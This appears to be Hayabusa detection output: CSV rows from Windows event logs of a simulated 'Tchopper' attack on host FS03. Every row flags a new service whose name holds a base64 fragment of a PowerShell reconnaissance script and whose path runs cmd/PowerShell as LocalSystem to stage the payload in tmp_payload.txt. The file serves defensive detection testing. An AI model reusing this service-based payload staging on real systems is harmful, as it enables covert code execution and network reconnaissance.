+2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
